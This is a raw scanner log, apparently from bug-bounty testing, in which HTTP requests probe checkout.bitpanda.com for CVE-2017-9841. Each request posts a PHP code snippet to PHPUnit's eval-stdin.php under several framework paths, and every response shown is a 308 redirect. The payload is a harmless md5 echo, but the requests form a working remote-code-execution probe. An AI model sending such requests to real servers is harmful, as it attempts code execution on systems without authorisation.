[CVE-2017-9841] Dumped HTTP request for http://checkout.bitpanda.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php


GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: checkout.bitpanda.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.3 Safari/605.1.15
Connection: close
Content-Length: 34
Content-Type: text/html
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip

<?php echo md5("CVE-2017-9841");?>
[CVE-2017-9841] Dumped HTTP response http://checkout.bitpanda.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

HTTP/1.1 308 Permanent Redirect
Connection: close
Content-Length: 164
Content-Type: text/html
Date: Tue, 05 Aug 2025 12:50:46 GMT
Location: https://checkout.bitpanda.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

<html>
<head><title>308 Permanent Redirect</title></head>
<body>
<center><h1>308 Permanent Redirect</h1></center>
<hr><center>nginx</center>
</body>
</html>

[CVE-2017-9841] Dumped HTTP request for http://checkout.bitpanda.com/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php


GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: checkout.bitpanda.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15
Connection: close
Content-Length: 34
Content-Type: text/html
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip

<?php echo md5("CVE-2017-9841");?>
[CVE-2017-9841] Dumped HTTP response http://checkout.bitpanda.com/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

HTTP/1.1 308 Permanent Redirect
Connection: close
Content-Length: 164
Content-Type: text/html
Date: Tue, 05 Aug 2025 12:50:46 GMT
Location: https://checkout.bitpanda.com/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

<html>
<head><title>308 Permanent Redirect</title></head>
<body>
<center><h1>308 Permanent Redirect</h1></center>
<hr><center>nginx</center>
</body>
</html>

[CVE-2017-9841] Dumped HTTP request for http://checkout.bitpanda.com/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php


GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: checkout.bitpanda.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0
Connection: close
Content-Length: 34
Content-Type: text/html
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip

<?php echo md5("CVE-2017-9841");?>
[CVE-2017-9841] Dumped HTTP response http://checkout.bitpanda.com/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

HTTP/1.1 308 Permanent Redirect
Connection: close
Content-Length: 164
Content-Type: text/html
Date: Tue, 05 Aug 2025 12:50:46 GMT
Location: https://checkout.bitpanda.com/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

<html>
<head><title>308 Permanent Redirect</title></head>
<body>
<center><h1>308 Permanent Redirect</h1></center>
<hr><center>nginx</center>
</body>
</html>

[CVE-2017-9841] Dumped HTTP request for http://checkout.bitpanda.com/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php


GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: checkout.bitpanda.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Connection: close
Content-Length: 34
Content-Type: text/html
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip

<?php echo md5("CVE-2017-9841");?>
[CVE-2017-9841] Dumped HTTP response http://checkout.bitpanda.com/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

HTTP/1.1 308 Permanent Redirect
Connection: close
Content-Length: 164
Content-Type: text/html
Date: Tue, 05 Aug 2025 12:50:46 GMT
Location: https://checkout.bitpanda.com/laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

<html>
<head><title>308 Permanent Redirect</title></head>
<body>
<center><h1>308 Permanent Redirect</h1></center>
<hr><center>nginx</center>
</body>
</html>

[CVE-2017-9841] Dumped HTTP request for http://checkout.bitpanda.com/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php


GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: checkout.bitpanda.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Connection: close
Content-Length: 34
Content-Type: text/html
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip

<?php echo md5("CVE-2017-9841");?>
[CVE-2017-9841] Dumped HTTP response http://checkout.bitpanda.com/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

HTTP/1.1 308 Permanent Redirect
Connection: close
Content-Length: 164
Content-Type: text/html
Date: Tue, 05 Aug 2025 12:50:46 GMT
Location: https://checkout.bitpanda.com/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

<html>
<head><title>308 Permanent Redirect</title></head>
<body>
<center><h1>308 Permanent Redirect</h1></center>
<hr><center>nginx</center>
</body>
</html>

[CVE-2017-9841] Dumped HTTP response http://checkout.bitpanda.com/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

HTTP/1.1 308 Permanent Redirect
Connection: close
Content-Length: 164
Content-Type: text/html
Date: Tue, 05 Aug 2025 12:50:47 GMT
Location: https://checkout.bitpanda.com/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

<html>
<head><title>308 Permanent Redirect</title></head>
<body>
<center><h1>308 Permanent Redirect</h1></center>
<hr><center>nginx</center>
</body>
</html>

